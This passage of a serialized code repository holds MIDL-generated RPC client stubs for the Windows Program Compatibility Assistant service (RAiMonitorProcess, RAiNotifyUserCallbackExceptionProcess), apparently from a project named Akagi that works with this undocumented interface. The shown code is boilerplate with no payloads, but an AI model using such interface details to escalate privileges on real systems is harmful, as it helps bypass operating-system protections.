flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x8010272, /* MIDL Version 8.1.626 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n\n"
},
{
"path": "Source/Akagi/pcasvc/w7/x64/pcasvc7_64.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc7_64_h__\n#define __pcasvc7_64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService7_INTERFACE_DEFINED__\n#define __PcaService7_INTERFACE_DEFINED__\n\n/* interface PcaService7 */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiNotifyUserCallbackExceptionProcess( \n handle_t bindingHandle,\n /* [string][in] */ wchar_t *exePathName,\n /* [in] */ long unknown0,\n /* [in] */ long processId);\n\n\n\nextern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;\n#endif /* __PcaService7_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.c",
"content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning supression added\n3. See pcasvc7__MIDL_ProcFormatString definition \"Modified\" comment\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include \n\n#include \"pcasvc7_32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 7 \n#define PROC_FORMAT_STRING_SIZE 53 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;\nextern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;\nextern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: PcaService7, ver. 1.0,\n GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService7_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;\n\n\nlong RAiNotifyUserCallbackExceptionProcess( \n handle_t bindingHandle,\n /* [string][in] */ wchar_t *exePathName,\n /* [in] */ long unknown0,\n /* [in] */ long processId)\n{\n\n CLIENT_CALL_RETURN _RetVal;\n\n _RetVal = NdrClientCall2(\n ( PMIDL_STUB_DESC )&PcaService7_StubDesc,\n (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],\n ( unsigned char * )&bindingHandle);\n return ( long )_RetVal.Simple;\n \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error Invalid build platform for this stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error /robust command line switch.\n#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiNotifyUserCallbackExceptionProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x4 ),\t/* 4 */\n/* 8 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* x86 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags: clt must size, has return, has ext, */\n\t\t\t0x4,\t\t/* 4 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter exePathName */\n\n/* 28 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 30 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 32 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\n\n\t/* Parameter unknown0 */\n\n/* 34 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 36 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter processId */\n\n/* 40 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 42 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 44 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 46 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 48 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 50 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short PcaService7_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC PcaService7_StubDesc = \n {\n (void *)& PcaService7___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &PcaService7__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n pcasvc7__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x8010272, /* MIDL Version 8.1.626 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
},
{
"path": "Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc7_32_h__\n#define __pcasvc7_32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService7_INTERFACE_DEFINED__\n#define __PcaService7_INTERFACE_DEFINED__\n\n/* interface PcaService7 */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiNotifyUserCallbackExceptionProcess( \n handle_t bindingHandle,\n /* [string][in] */ wchar_t *exePathName,\n /* [in] */ long unknown0,\n /* [in] */ long processId);\n\n\n\nextern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;\n#endif /* __PcaService7_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/pcasvc.acf",
"content": "[\n\texplicit_handle\n]\ninterface PcaService\n{\n\tRAiMonitorProcess();\n}\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/pcasvc.idl",
"content": "[\n\tuuid(0767a036-0d22-48aa-ba69-b619480f38cb),\n\tversion(1.0),\n]\ninterface PcaService\n{\n\tlong RAiMonitorProcess(\n\t\thandle_t bindingHandle,\n\t\t[in]unsigned __int3264 hProcess,\n\t\t[in]long unknown0,\n\t\t[in][unique][string]wchar_t* exeFileName,\n\t\t[in][unique][string]wchar_t* cmdLine,\n\t\t[in][unique][string]wchar_t* workingDir,\n\t\t[in]long flags\n\t);\n}\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/x64/pcasvc64.c",
"content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning supression added\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n\n#include \n\n#include \"pcasvc64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 7 \n#define PROC_FORMAT_STRING_SIZE 73 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;\nextern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;\nextern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: PcaService, ver. 1.0,\n GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;\n\n\nlong RAiMonitorProcess( \n handle_t bindingHandle,\n /* [in] */ unsigned __int3264 hProcess,\n /* [in] */ long unknown0,\n /* [string][unique][in] */ wchar_t *exeFileName,\n /* [string][unique][in] */ wchar_t *cmdLine,\n /* [string][unique][in] */ wchar_t *workingDir,\n /* [in] */ long flags)\n{\n\n CLIENT_CALL_RETURN _RetVal;\n\n _RetVal = NdrClientCall2(\n ( PMIDL_STUB_DESC )&PcaService_StubDesc,\n (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],\n bindingHandle,\n hProcess,\n unknown0,\n exeFileName,\n cmdLine,\n workingDir,\n flags);\n return ( long )_RetVal.Simple;\n \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error Invalid build platform for this stub.\n#endif\n\nstatic const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiMonitorProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 8 */\tNdrFcShort( 0x40 ),\t/* X64 Stack size/offset = 64 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x18 ),\t/* 24 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags: clt must size, has return, has ext, */\n\t\t\t0x7,\t\t/* 7 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter hProcess */\n\n/* 30 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 34 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter unknown0 */\n\n/* 36 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 38 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter exeFileName */\n\n/* 42 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 46 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter cmdLine */\n\n/* 48 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 50 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 52 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter workingDir */\n\n/* 54 */\tNdrFcShort( 0xb ),\t/* Flags: must size, must free, in, */\n/* 56 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 58 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter flags */\n\n/* 60 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 62 */\tNdrFcShort( 0x30 ),\t/* X64 Stack size/offset = 48 */\n/* 64 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 66 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 68 */\tNdrFcShort( 0x38 ),\t/* X64 Stack size/offset = 56 */\n/* 70 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short PcaService_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC PcaService_StubDesc = \n {\n (void *)& PcaService___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &PcaService__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n pcasvc__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check flag */\n 0x50002, /* Ndr library version */\n 0,\n 0x8010272, /* MIDL Version 8.1.626 */\n 0,\n 0,\n 0, /* notify & notify_flag routine table */\n 0x1, /* MIDL flag */\n 0, /* cs routines */\n 0, /* proxy/server info */\n 0\n };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/x64/pcasvc64.h",
"content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n\n\n/* verify that the version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of \n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc64_h__\n#define __pcasvc64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService_INTERFACE_DEFINED__\n#define __PcaService_INTERFACE_DEFINED__\n\n/* interface PcaService */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiMonitorProcess( \n handle_t bindingHandle,\n /* [in] */ unsigned __int3264 hProcess,\n /* [in] */ long unknown0,\n /* [string][unique][in] */ wchar_t *exeFileName,\n /* [string][unique][in] */ wchar_t *cmdLine,\n /* [string][unique][in] */ wchar_t *workingDir,\n /* [in] */ long flags);\n\n\n\nextern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;\n#endif /* __PcaService_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
},
{
"path": "Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.c",
"content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning supression added\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include \n\n#include \"pcasvc32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 7 \n#define PROC_FORMAT_STRING_SIZE 71 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } pcasvc_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;\nextern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;\nextern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: PcaService, ver. 1.0,\n GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;\n\n\nlong RAiMonitorProcess( \n handle_t bindingHandle,\n /* [in] */ unsigned __int3264 hProcess,\n /* [in] */ long unknown0,\n /* [string][unique][in] */ wchar_t *exeFileName,\n /* [string][unique][in] */ wchar_t *cmdLine,\n /* [string][unique][in] */ wchar_t *workingDir,\n /* [in] */ long flags)\n{\n\n CLIENT_CALL_RETURN _RetVal;\n\n _RetVal = NdrClientCall2(\n ( PMIDL_STUB_DESC )&PcaService_StubDesc,\n (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],\n ( unsigned char * )&bindingHandle);\n return ( long )_RetVal.Simple;\n \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error Invalid build platform for this 